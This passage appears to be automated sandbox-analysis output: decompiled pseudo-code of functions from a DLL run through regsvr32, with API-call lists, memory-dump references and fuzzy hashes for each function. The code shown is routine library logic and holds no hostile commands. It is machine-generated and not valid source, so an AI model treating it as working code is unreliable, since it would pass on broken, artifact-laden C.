                                                                                                                				if( *((intOrPtr*)(_t119 + 0x20)) == 0) {
                                                                                                                					_t115 = 0x94;
                                                                                                                					E10049170(0x94, _t119 - 0xa4, 0, 0x94);
                                                                                                                					_t120 = _t120 + 0xc;
                                                                                                                					 *(_t119 - 0xa4) = 0x94;
                                                                                                                					GetVersionExA(_t119 - 0xa4);
                                                                                                                					if( *((intOrPtr*)(_t119 - 0x94)) != 2) {
                                                                                                                						L3:
                                                                                                                						 *((intOrPtr*)(_t119 + 0x20)) = 0x4c;
                                                                                                                					} else {
                                                                                                                						 *((intOrPtr*)(_t119 + 0x20)) = 0x58;
                                                                                                                						if( *((intOrPtr*)(_t119 - 0xa0)) < 5) {
                                                                                                                							goto L3;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t70 = E10047026(0, _t110, _t115, _t118,  *((intOrPtr*)(_t119 + 0x20)));
                                                                                                                				_t127 = _t70;
                                                                                                                				_pop(_t101);
                                                                                                                				 *((intOrPtr*)(_t118 + 0x74)) = _t70;
                                                                                                                				if(_t70 == 0) {
                                                                                                                					_t70 = E1000A035(0, _t101, _t115, _t118, _t127);
                                                                                                                				}
                                                                                                                				E10049170(_t115, _t70, 0,  *((intOrPtr*)(_t119 + 0x20)));
                                                                                                                				_t72 =  *(_t119 + 8);
                                                                                                                				 *(_t118 + 0x78) = _t72;
                                                                                                                				asm("sbb eax, eax");
                                                                                                                				 *((intOrPtr*)(_t118 + 0x54)) =  ~_t72 + 0x7005;
                                                                                                                				 *((intOrPtr*)(_t118 + 0x1c4)) = 0;
                                                                                                                				_t102 = _t118 + 0x80;
                                                                                                                				 *_t102 = 0;
                                                                                                                				_t116 = _t118 + 0xc0;
                                                                                                                				 *_t116 = 0;
                                                                                                                				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)))) =  *((intOrPtr*)(_t119 + 0x20));
                                                                                                                				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0x1c)) = _t116;
                                                                                                                				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0x20)) = 0x104;
                                                                                                                				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0x3c)) =  *((intOrPtr*)(_t119 + 0xc));
                                                                                                                				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0x24)) = _t102;
                                                                                                                				_t103 = 0x40;
                                                                                                                				 *( *((intOrPtr*)(_t118 + 0x74)) + 0x28) = _t103;
                                                                                                                				 *( *((intOrPtr*)(_t118 + 0x74)) + 0x34) =  *( *((intOrPtr*)(_t118 + 0x74)) + 0x34) |  *(_t119 + 0x14) | 0x00080020;
                                                                                                                				if(( *(_t119 + 0x14) & _t103) != 0) {
                                                                                                                					_t92 =  *((intOrPtr*)(_t118 + 0x74));
                                                                                                                					_t48 = _t92 + 0x34;
                                                                                                                					 *_t48 =  *(_t92 + 0x34) & 0xff7fffff;
                                                                                                                					_t129 =  *_t48;
                                                                                                                				}
                                                                                                                				_t82 = E1001E302(0, _t116, _t118, _t129);
                                                                                                                				_t104 =  *((intOrPtr*)(_t118 + 0x74));
                                                                                                                				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 8)) =  *((intOrPtr*)(_t82 + 0xc));
                                                                                                                				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0x44)) = E1003FF42;
                                                                                                                				if( *((intOrPtr*)(_t119 - 0xac)) != 0) {
                                                                                                                					E1000A0B7(0, _t104, _t116, _t118, _t119, _t116, 0x104,  *((intOrPtr*)(_t119 - 0xac)), 0xffffffff);
                                                                                                                				}
                                                                                                                				if( *((intOrPtr*)(_t119 - 0xa8)) != 0) {
                                                                                                                					_t116 = _t118 + 0x7c;
                                                                                                                					L100011E5(_t118 + 0x7c,  *((intOrPtr*)(_t119 - 0xa8)));
                                                                                                                					_t88 = L100011F4(_t118 + 0x7c, 0);
                                                                                                                					while(1) {
                                                                                                                						_t89 = E1004CBA9(_t88, 0x7c);
                                                                                                                						if(_t89 == 0) {
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						 *_t89 = 0;
                                                                                                                						_t88 = _t89 + 1;
                                                                                                                						__eflags = _t89 + 1;
                                                                                                                					}
                                                                                                                					 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0xc)) =  *((intOrPtr*)(_t118 + 0x7c));
                                                                                                                				}
                                                                                                                				return E10047739(0, _t116, _t118);
                                                                                                                			}

















                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 10038519
                                                                                                                  • Part of subcall function 1001B6E7: _memset.LIBCMT ref: 1001B6FE
                                                                                                                • _memset.LIBCMT ref: 1003856C
                                                                                                                • GetVersionExA.KERNEL32(?,00000000,00000000,00000018), ref: 10038581
                                                                                                                • _malloc.LIBCMT ref: 100385AA
                                                                                                                • _memset.LIBCMT ref: 100385C1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset$H_prolog3_Version_malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1339555267-0
                                                                                                                • Opcode ID: 1422dff509074d4d1f73794e736090bdd5341f7153cd0141cfaf232a2483be12
                                                                                                                • Instruction ID: f295394b957d1c0ebfc845127732de9d50591da18fa0336fb8d5660b5ee4c552
                                                                                                                • Opcode Fuzzy Hash: 1422dff509074d4d1f73794e736090bdd5341f7153cd0141cfaf232a2483be12
                                                                                                                • Instruction Fuzzy Hash: BF515DB4900B45DFDB22CF64C981A9ABBE0FF09314F1146ADEA999B361C734E944CF11
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 67%
                                                                                                                			E10001019(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t35;
                                                                                                                				int _t44;
                                                                                                                				int _t51;
                                                                                                                				long _t64;
                                                                                                                				void* _t65;
                                                                                                                				void* _t80;
                                                                                                                				void* _t83;
                                                                                                                				void* _t85;
                                                                                                                				void* _t86;
                                                                                                                				signed int _t89;
                                                                                                                				void* _t91;
                                                                                                                
                                                                                                                				_t80 = __edx;
                                                                                                                				_t89 = _t91 - 0x104;
                                                                                                                				_t35 =  *0x100b9e70; // 0xbb35530
                                                                                                                				 *(_t89 + 0x108) = _t35 ^ _t89;
                                                                                                                				_push(8);
                                                                                                                				E1004764D(0x1008d836, __ebx, __edi, __esi);
                                                                                                                				 *(_t89 - 0x14) =  *(_t89 + 0x118);
                                                                                                                				 *(_t89 + 0x84) = 0;
                                                                                                                				 *((intOrPtr*)(_t89 - 4)) = 0;
                                                                                                                				L10001285(_t89,  *((intOrPtr*)(_t89 + 0x114)));
                                                                                                                				_t85 = GetEnvironmentVariableA;
                                                                                                                				 *((char*)(_t89 - 4)) = 1;
                                                                                                                				_t64 = GetEnvironmentVariableA( *_t89, 0, 0);
                                                                                                                				if(_t64 == 0 || _t64 == 0xffffffff) {
                                                                                                                					L17:
                                                                                                                					__eflags =  *_t89 - _t89 + 4;
                                                                                                                					if(__eflags != 0) {
                                                                                                                						_push( *_t89);
                                                                                                                						E100470E9(_t64, 0, _t85, __eflags);
                                                                                                                					}
                                                                                                                					_t43 = _t89 + 0x88;
                                                                                                                					__eflags =  *(_t89 + 0x84) - _t89 + 0x88;
                                                                                                                					if( *(_t89 + 0x84) != _t89 + 0x88) {
                                                                                                                						L10001456(_t43, _t89 + 0x84);
                                                                                                                					}
                                                                                                                					_t44 = 0;
                                                                                                                					__eflags = 0;
                                                                                                                				} else {
                                                                                                                					_t9 = _t64 + 1; // 0x1
                                                                                                                					L100013D9(_t89 + 0x84, _t9);
                                                                                                                					if(GetEnvironmentVariableA( *_t89,  *(_t89 + 0x84), _t64) == 0) {
                                                                                                                						goto L17;
                                                                                                                					} else {
                                                                                                                						_t51 =  *0x100bb480();
                                                                                                                						_t88 = MultiByteToWideChar;
                                                                                                                						_t66 = MultiByteToWideChar(_t51, 0,  *(_t89 + 0x84), 0xffffffff, 0, 0);
                                                                                                                						 *(_t89 - 0x10) = _t66;
                                                                                                                						if( *((intOrPtr*)(_t89 + 0x11c)) != 0) {
                                                                                                                							__eflags =  *((intOrPtr*)(_t89 + 0x11c)) - _t66;
                                                                                                                							if( *((intOrPtr*)(_t89 + 0x11c)) >= _t66) {
                                                                                                                								_t66 =  *(_t89 + 0x84);
                                                                                                                								 *(_t89 - 0x10) = MultiByteToWideChar( *0x100bb480(), 0,  *(_t89 + 0x84), 0xffffffff,  *(_t89 - 0x14),  *(_t89 - 0x10));
                                                                                                                							}
                                                                                                                							__eflags =  *_t89 - _t89 + 4;
                                                                                                                							if(__eflags != 0) {
                                                                                                                								_push( *_t89);
                                                                                                                								E100470E9(_t66, 0, _t88, __eflags);
                                                                                                                							}
                                                                                                                							_t54 = _t89 + 0x88;
                                                                                                                							__eflags =  *(_t89 + 0x84) - _t89 + 0x88;
                                                                                                                							if( *(_t89 + 0x84) != _t89 + 0x88) {
                                                                                                                								L10001456(_t54, _t89 + 0x84);
                                                                                                                							}
                                                                                                                							_t44 =  *(_t89 - 0x10);
                                                                                                                						} else {
                                                                                                                							_t99 =  *_t89 - _t89 + 4;
                                                                                                                							if( *_t89 != _t89 + 4) {
                                                                                                                								_push( *_t89);
                                                                                                                								E100470E9(_t66, 0, MultiByteToWideChar, _t99);
                                                                                                                							}
                                                                                                                							_t60 = _t89 + 0x88;
                                                                                                                							if( *(_t89 + 0x84) != _t89 + 0x88) {
                                                                                                                								L10001456(_t60, _t89 + 0x84);
                                                                                                                							}
                                                                                                                							_t44 = _t66;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				 *[fs:0x0] =  *((intOrPtr*)(_t89 - 0xc));
                                                                                                                				_pop(_t83);
                                                                                                                				_pop(_t86);
                                                                                                                				_pop(_t65);
                                                                                                                				return E1004763E(_t44, _t65,  *(_t89 + 0x108) ^ _t89, _t80, _t83, _t86);
                                                                                                                			}
















                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10002A2C
                                                                                                                • GetEnvironmentVariableA.KERNEL32(?,00000000,00000000,?,00000008), ref: 10002A63
                                                                                                                • GetEnvironmentVariableA.KERNEL32(?,?,00000000,00000001), ref: 10002A91
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 10002AB4
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?), ref: 10002B10
                                                                                                                  • Part of subcall function 100470E9: __lock.LIBCMT ref: 10047107
                                                                                                                  • Part of subcall function 100470E9: ___sbh_find_block.LIBCMT ref: 10047112
                                                                                                                  • Part of subcall function 100470E9: ___sbh_free_block.LIBCMT ref: 10047121
                                                                                                                  • Part of subcall function 100470E9: HeapFree.KERNEL32(00000000,?,100B59B0), ref: 10047151
                                                                                                                  • Part of subcall function 100470E9: GetLastError.KERNEL32(?,1005493C,?,00000001,00000001,1004ECAF,00000018,100B5BF0,0000000C,1004ED3E,00000001,00000001,?,10051765,0000000D,100B5E08), ref: 10047162
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharEnvironmentMultiVariableWide$ErrorFreeH_prolog3HeapLast___sbh_find_block___sbh_free_block__lock
                                                                                                                • String ID:
                                                                                                                • API String ID: 3879487779-0
                                                                                                                • Opcode ID: 3fefc56506f4373e2cee5d46a2f543389d890174a798ff63ba7b94a952f91040
                                                                                                                • Instruction ID: b39ed74ae4ee6fdc897746ccce5b9efe2c84ee4406a20ebe1584f394e1056a1b
                                                                                                                • Opcode Fuzzy Hash: 3fefc56506f4373e2cee5d46a2f543389d890174a798ff63ba7b94a952f91040
                                                                                                                • Instruction Fuzzy Hash: 38415531900189EBEF74DF64CD81ADE77B9FF44390F50812AEA59DA195EF70AA04CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 92%
                                                                                                                			E1002BE83(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* _t55;
                                                                                                                				signed int _t56;
                                                                                                                				void* _t68;
                                                                                                                
                                                                                                                				_push(0x14);
                                                                                                                				E1004764D(0x100901ae, __ebx, __edi, __esi);
                                                                                                                				_t55 =  *((intOrPtr*)(_t68 + 0xc)) + 0x2cc;
                                                                                                                				if(_t55 > 0xf) {
                                                                                                                					L21:
                                                                                                                					_t56 = 0;
                                                                                                                				} else {
                                                                                                                					switch( *((intOrPtr*)(( *(_t55 + 0x1002c043) & 0x000000ff) * 4 +  &M1002C01B))) {
                                                                                                                						case 0:
                                                                                                                							__eax =  *(__ebp + 0x10);
                                                                                                                							 *__eax = 2;
                                                                                                                							 *(__eax + 8) = 1;
                                                                                                                							goto L4;
                                                                                                                						case 1:
                                                                                                                							_t59 =  *((intOrPtr*)(_t68 + 0x10));
                                                                                                                							 *(_t59 + 8) =  *(_t59 + 8) | 0x0000ffff;
                                                                                                                							goto L3;
                                                                                                                						case 2:
                                                                                                                							__esi =  *(__ebp + 0x10);
                                                                                                                							__ecx =  *(__ebp + 8);
                                                                                                                							 *__esi = 0xb;
                                                                                                                							__eax = E1002C4F3( *(__ebp + 8));
                                                                                                                							__eax =  ~__eax;
                                                                                                                							asm("sbb eax, eax");
                                                                                                                							 *(__esi + 8) = __ax;
                                                                                                                							goto L4;
                                                                                                                						case 3:
                                                                                                                							__eax =  *(__ebp + 0x10);
                                                                                                                							 *(__eax + 8) =  *(__eax + 8) & 0x00000000;
                                                                                                                							L3:
                                                                                                                							 *_t59 = 0xb;
                                                                                                                							goto L4;
                                                                                                                						case 4:
                                                                                                                							__eax = E100184C0();
                                                                                                                							__ecx = __ebp + 0xc;
                                                                                                                							__eax = L1000140B(__ebp + 0xc, __eax);
                                                                                                                							__ecx = __ebp + 0xc;
                                                                                                                							 *(__ebp - 4) = 1;
                                                                                                                							__eax = L10001276(__ebp + 0xc, 0xf1c0);
                                                                                                                							goto L19;
                                                                                                                						case 5:
                                                                                                                							__esi =  *(__ebp + 0x10);
                                                                                                                							 *__esi = 3;
                                                                                                                							__eax = GetThreadLocale();
                                                                                                                							 *(__esi + 8) = __eax;
                                                                                                                							goto L4;
                                                                                                                						case 6:
                                                                                                                							__eflags =  *(__esi + 0x5c) - 0xffffffff;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								_push( *(__esi + 0x20));
                                                                                                                								__ecx = __ebp - 0x20;
                                                                                                                								__eax = L1000CDFE(__ebx, __ebp - 0x20, __edi, __esi, __eflags);
                                                                                                                								 *(__esi + 0x20) = SendMessageA( *( *(__esi + 0x20) + 0x20), 0x138,  *(__ebp - 0x1c),  *( *(__esi + 0x20) + 0x20));
                                                                                                                								 *(__esi + 0x5c) = GetBkColor( *(__ebp - 0x18));
                                                                                                                								__eax = GetTextColor( *(__ebp - 0x18));
                                                                                                                								__ecx = __ebp - 0x20;
                                                                                                                								 *(__esi + 0x60) = __eax;
                                                                                                                								__eax = L1000CE52(__ebx, __ebp - 0x20, __edi, __esi, __eflags);
                                                                                                                							}
                                                                                                                							__eflags = __edi - 0xfffffd43;
                                                                                                                							__eax =  *(__ebp + 0x10);
                                                                                                                							 *__eax = 3;
                                                                                                                							if(__edi != 0xfffffd43) {
                                                                                                                								__esi =  *(__esi + 0x60);
                                                                                                                							} else {
                                                                                                                								__esi =  *(__esi + 0x5c);
                                                                                                                							}
                                                                                                                							 *(__eax + 8) = __esi;
                                                                                                                							goto L4;
                                                                                                                						case 7:
                                                                                                                							__eflags =  *(__esi + 0x64);
                                                                                                                							if(__eflags != 0) {
                                                                                                                								L15:
                                                                                                                								__edi =  *(__ebp + 0x10);
                                                                                                                								 *__edi = 9;
                                                                                                                								__eax =  *(__esi + 0x64);
                                                                                                                								__ecx =  *__eax;
                                                                                                                								_push(__eax);
                                                                                                                								__eax =  *((intOrPtr*)( *__eax + 4))();
                                                                                                                								__eax =  *(__esi + 0x64);
                                                                                                                								 *(__edi + 8) = __eax;
                                                                                                                								goto L4;
                                                                                                                							} else {
                                                                                                                								__ecx =  *(__esi + 0x20);
                                                                                                                								__eax = E1002B00E( *(__esi + 0x20));
                                                                                                                								__ecx = __esi;
                                                                                                                								__eax = E1002BD4A(__ebx, __esi, __edi, __esi, __eflags, __eax);
                                                                                                                								__eflags =  *(__esi + 0x64);
                                                                                                                								if( *(__esi + 0x64) == 0) {
                                                                                                                									goto L21;
                                                                                                                								} else {
                                                                                                                									goto L15;
                                                                                                                								}
                                                                                                                							}
                                                                                                                							goto L22;
                                                                                                                						case 8:
                                                                                                                							__eax = E100184C0();
                                                                                                                							__ecx = __ebp + 0xc;
                                                                                                                							__eax = L1000140B(__ebp + 0xc, __eax);
                                                                                                                							_t44 = __ebp - 4;
                                                                                                                							 *_t44 =  *(__ebp - 4) & 0x00000000;
                                                                                                                							__eflags =  *_t44;
                                                                                                                							L19:
                                                                                                                							__esi =  *(__ebp + 0x10);
                                                                                                                							__ecx = __ebp + 0xc;
                                                                                                                							 *__esi = 8;
                                                                                                                							__eax = E100147D9(__ebx, __ebp + 0xc, __edx, __edi, __esi);
                                                                                                                							__ecx =  *(__ebp + 0xc);
                                                                                                                							__ecx =  *(__ebp + 0xc) + 0xfffffff0;
                                                                                                                							 *(__esi + 8) = __eax;
                                                                                                                							__eax = L100013E3( *(__ebp + 0xc) + 0xfffffff0, __edx);
                                                                                                                							L4:
                                                                                                                							_t56 = 1;
                                                                                                                							goto L22;
                                                                                                                						case 9:
                                                                                                                							goto L21;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				L22:
                                                                                                                				return E10047725(_t56);
                                                                                                                			}







                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1002BE8A
                                                                                                                • SendMessageA.USER32 ref: 1002BF02
                                                                                                                • GetBkColor.GDI32(?), ref: 1002BF0B
                                                                                                                • GetTextColor.GDI32(?), ref: 1002BF17
                                                                                                                • GetThreadLocale.KERNEL32(0000F1C0,00000000,?,?,00000014), ref: 1002BFA9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$H_prolog3LocaleMessageSendTextThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 187318432-0
                                                                                                                • Opcode ID: d22433670a3056a702978a9435578d9b71aa6b37bc2a414f49c1d96738fc2e7c
                                                                                                                • Instruction ID: 0c5270fe824628972eb2d5b37537cdc2cc1a572c30690f40372f275bdb27a436
                                                                                                                • Opcode Fuzzy Hash: d22433670a3056a702978a9435578d9b71aa6b37bc2a414f49c1d96738fc2e7c
                                                                                                                • Instruction Fuzzy Hash: 30416738400B0ADFDB20DFA4D88599EB7F0FF08314F618959F99A9B2A1D774A940DB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 76%
                                                                                                                			E1000AA09(void* _a4, short _a20, short _a24, short _a28, short _a32, short _a36, short _a40, WCHAR* _a44, WCHAR* _a48) {
                                                                                                                				signed int _v8;
                                                                                                                				char _v24;
                                                                                                                				WCHAR* _v28;
                                                                                                                				void* _v32;
                                                                                                                				WCHAR* _v36;
                                                                                                                				short _v40;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t45;
                                                                                                                				long _t48;
                                                                                                                				void* _t49;
                                                                                                                				WCHAR* _t67;
                                                                                                                				void* _t70;
                                                                                                                				WCHAR* _t72;
                                                                                                                				short* _t73;
                                                                                                                				short* _t76;
                                                                                                                				signed int _t78;
                                                                                                                				void* _t79;
                                                                                                                
                                                                                                                				_t45 =  *0x100b9e70; // 0xbb35530
                                                                                                                				_v8 = _t45 ^ _t78;
                                                                                                                				_t67 = _a48;
                                                                                                                				asm("movsd");
                                                                                                                				asm("movsd");
                                                                                                                				asm("movsd");
                                                                                                                				asm("movsd");
                                                                                                                				_t72 = _a44;
                                                                                                                				_v36 = _t72;
                                                                                                                				_v28 = _t67;
                                                                                                                				if(_t72 == 0) {
                                                                                                                					_t76 = 0;
                                                                                                                				} else {
                                                                                                                					_t76 = lstrlenW(_t72) + 1;
                                                                                                                				}
                                                                                                                				if(_t67 == 0 ||  *_t67 == 0) {
                                                                                                                					_v28 = _t72;
                                                                                                                					_t73 = _t76;
                                                                                                                				} else {
                                                                                                                					_t73 = lstrlenW(_t67) + 1;
                                                                                                                				}
                                                                                                                				_t48 = _t73 + _t76 + _t73 + _t76 + 0x34;
                                                                                                                				_v40 = _t48;
                                                                                                                				_t49 = GlobalAlloc(0x2042, _t48);
                                                                                                                				_v32 = _t49;
                                                                                                                				if(_t49 != 0) {
                                                                                                                					_t67 = GlobalLock(_t49);
                                                                                                                					if(_v36 == 0) {
                                                                                                                						_t67[0x16] = _t67[0x16] & 0x00000000;
                                                                                                                					} else {
                                                                                                                						_t16 =  &(_t67[0x1a]); // 0x34
                                                                                                                						_t67[0x16] = 0x34;
                                                                                                                						L1000146A(_t67, _t70, _t73, _t76, _t78, _t16, _t76, _v36);
                                                                                                                						_t79 = _t79 + 0xc;
                                                                                                                					}
                                                                                                                					if(_v28 == 0) {
                                                                                                                						_t67[0x18] = _t67[0x18] & 0x00000000;
                                                                                                                					} else {
                                                                                                                						_t23 =  &(_t76[0x1a]); // 0x34
                                                                                                                						_t67[0x18] = _t76 + _t23;
                                                                                                                						L1000146A(_t67, _t70, _t73, _t76, _t78, _t67 + _t76 + _t23, _t73, _v28);
                                                                                                                					}
                                                                                                                					 *_t67 = _v40;
                                                                                                                					_t67[0xa] = _a20;
                                                                                                                					_t32 =  &(_t67[2]); // 0x4
                                                                                                                					_t73 = _t32;
                                                                                                                					_t76 =  &_v24;
                                                                                                                					asm("movsd");
                                                                                                                					_t67[0xc] = _a24;
                                                                                                                					asm("movsd");
                                                                                                                					_t67[0xe] = _a28;
                                                                                                                					_t67[0x10] = _a32;
                                                                                                                					asm("movsd");
                                                                                                                					_t67[0x12] = _a36;
                                                                                                                					asm("movsd");
                                                                                                                					_t67[0x14] = _a40;
                                                                                                                					GlobalUnlock(_v32);
                                                                                                                					_t49 = _v32;
                                                                                                                				}
                                                                                                                				return E1004763E(_t49, _t67, _v8 ^ _t78, _t70, _t73, _t76);
                                                                                                                			}
























                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$lstrlen$AllocLockUnlock
                                                                                                                • String ID:
                                                                                                                • API String ID: 3485620298-0
                                                                                                                • Opcode ID: a80b5a4aaa3506d32d484be4876513a8ea2ef846ceb0bf23f531e99caf48785a
                                                                                                                • Instruction ID: e29acd5971e8066f24837a147dbfdc0d19c6ad84f3fd3389191f34aaa7994333
                                                                                                                • Opcode Fuzzy Hash: a80b5a4aaa3506d32d484be4876513a8ea2ef846ceb0bf23f531e99caf48785a
                                                                                                                • Instruction Fuzzy Hash: 27414AB1A00209DFDF40CF64C984AEABBF9FF4A385F11016AED05A7245D375E945CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 75%
                                                                                                                			E10025B8D(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, long long __fp0) {
                                                                                                                				void* _t67;
                                                                                                                				void* _t90;
                                                                                                                				intOrPtr _t93;
                                                                                                                				struct HWND__* _t95;
                                                                                                                				void* _t96;
                                                                                                                				struct HWND__* _t98;
                                                                                                                				long long _t102;
                                                                                                                
                                                                                                                				_t102 = __fp0;
                                                                                                                				_t91 = __edi;
                                                                                                                				_t90 = __edx;
                                                                                                                				_push(0x1c);
                                                                                                                				E1004764D(0x1008fa4a, __ebx, __edi, __esi);
                                                                                                                				_t95 =  *(_t96 + 8);
                                                                                                                				_t98 = _t95;
                                                                                                                				_t99 = _t98 == 0;
                                                                                                                				if(_t98 == 0) {
                                                                                                                					E1000A069(0, __ecx, __edi, _t95, _t99);
                                                                                                                				}
                                                                                                                				asm("fldz");
                                                                                                                				 *((long long*)(_t96 - 0x18)) = _t102;
                                                                                                                				 *((intOrPtr*)(_t96 - 0x10)) = 0;
                                                                                                                				E1001F0AF(_t95,  *((intOrPtr*)(_t96 + 0xc)));
                                                                                                                				E100176B3( *((intOrPtr*)(_t95 + 4)),  *((intOrPtr*)(_t96 + 0xc)), _t96 + 8);
                                                                                                                				if(_t95->i == 0) {
